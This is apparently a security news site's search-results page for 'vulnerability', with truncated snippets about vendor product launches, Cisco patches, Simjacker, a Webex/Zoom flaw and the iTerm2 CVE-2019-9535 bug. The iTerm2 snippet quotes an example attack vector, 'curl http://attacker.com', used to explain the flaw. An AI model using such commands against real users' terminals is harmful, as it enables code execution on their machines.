Search results for: vulnerability
Greenbone Networks, a leading provider of vulnerability management solutions, announced it is launching a new service platform that will enable its UK channel partners to offer customers vulnerability management (VM) as a fully managed service. Ideal for micro-businesses and small and medium enterprises (SMEs), the new Greenbone Managed Service (GMS) platform will offer enterprise-grade protection without the need to purchase hardware or software, or for any specialist cybersecurity expertise. The new platform will be available … More →
Cisco has released security updates for a variety of its products – owners of Small Business RV Series Routers, Web Security Appliances and TelePresence devices should pay extra attention. Small Business Routers Several series of Cisco Small Business RV Series Routers are vulnerable to remote code execution (via malicious HTTP request) and command injection (through malicious input in the web-based management interface). Both flaws can only be exploited by an authenticated attacker and none of … More →
Adaptiva, a leading, global provider of endpoint management and security solutions for enterprise customers, announced the release of Evolve VM. This vulnerability life cycle product automatically assesses endpoints for thousands of vulnerability, compliance, and health issues and remediates them as soon as they are detected. Utilizing NIST’s National Vulnerability Database and National Checklist Program Repository as well as hundreds of built-in custom client health checks, Evolve VM leverages Adaptiva’s peer-to-peer technology to address problems with … More →
Trend Micro, a global leader in cybersecurity solutions, announced a new vulnerability research competition, Pwn2Own Miami, run by Trend Micro’s Zero Day Initiative (ZDI). The first of its kind contest will challenge participants to find vulnerabilities in a range of popular industrial control system (ICS) software and protocols. Over the past 12 years, Pwn2Own has encouraged vulnerability research in the most critical platforms for enterprises globally. In 2018, the ZDI purchased 224% more zero-day vulnerabilities … More →
Trend Micro, the global leader in cloud security, announced a strategic partnership with Snyk, the leader in developer-first open source security. The partnership will focus on solving the unrelenting challenge that open source vulnerabilities create for developers, stemming from code-reuse, public repositories and open source. Together, Trend Micro and Snyk will help businesses manage the risk of vulnerabilities without interrupting the software delivery process. The combination of open source vulnerability intelligence from Snyk and Trend … More →
A critical vulnerability (CVE-2019-9535) in iTerm2, a macOS terminal emulator frequently used by developers and system administrators, could allow attackers to take control of a target system. “An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer,” Mozilla explained. “Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will … More →
Cequence Security’s CQ Prime Threat Research Team discovered of a vulnerability in Cisco Webex and Zoom video conferencing platforms that potentially allows an attacker to enumerate or list and view active meetings that are not protected. The web conferencing market includes nearly three dozen vendors, some of whom may use similar meeting identification techniques. Although the CQ Prime team did not test each of these products, it is possible they could be susceptible as well. … More →
Following extensive research, AdaptiveMobile Security has uncovered a new and previously undetected vulnerability. This vulnerability is currently being exploited and is being used for targeted surveillance of mobile phone users. The vulnerability and its associated attacks have been named Simjacker as it involves the hijacking of SIM cards and threatens mobile phone users across the globe. What does Simjacker do? Simjacker extracts the location information of mobile phone users from vulnerable operators, retrieved using malicious … More →
AlertEnterprise, the leading physical-logical security convergence software company, has successfully integrated its Airport Guardian software with the Federal Bureau of Investigation’s (FBI) Record of Arrest and Prosecution Background (Rap Back) service. By integrating the Rap Back service, Airport Guardian software is designed to help airports significantly reduce vulnerability and risk in vetting the security backgrounds of job applicants and employees. The integration delivers real-time and continuous criminal history record checks (CHRC) during personnel selection and … More →
In this Help Net Security podcast recorded at Black Hat USA 2019, Hari Srinivasan, Director of Product Management for Qualys, talks about the basics of securing your cloud. Here’s a transcript of the podcast for your convenience. Hello and welcome to today’s podcast. A bunch of questions are being thrown again about cloud security. Is the cloud inherently secure? Isn’t it too chaotic and elastic that implementing a security strategy is really tough? My name … More →
Greenbone, a leading provider of vulnerability analysis for IT networks, announced that its portfolio of vulnerability management (VM) products is now available via virtual appliances. Greenbone’s customers can now choose to deploy physical or virtual appliances, increasing flexibility and efficiency, while ensuring that data protection is always guaranteed. VM solutions identify and patch security-relevant vulnerabilities in IT systems, helping businesses reduce their exposure to risks and improving the overall resilience of their infrastructures. Greenbone’s entire … More →
Denim Group, the leading independent application security firm, announced the latest version of their Jenkins Plugin to integrate with their flagship vulnerability management product, ThreadFix. This plugin will allow development teams to incorporate application security testing into continuous integration and continuous delivery (CI/CD) pipelines, encouraging teams to address security concerns in a flexible manner. ThreadFix allows organizations to manage their application security programs and address risks to business operations that could be affected by vulnerabilities … More →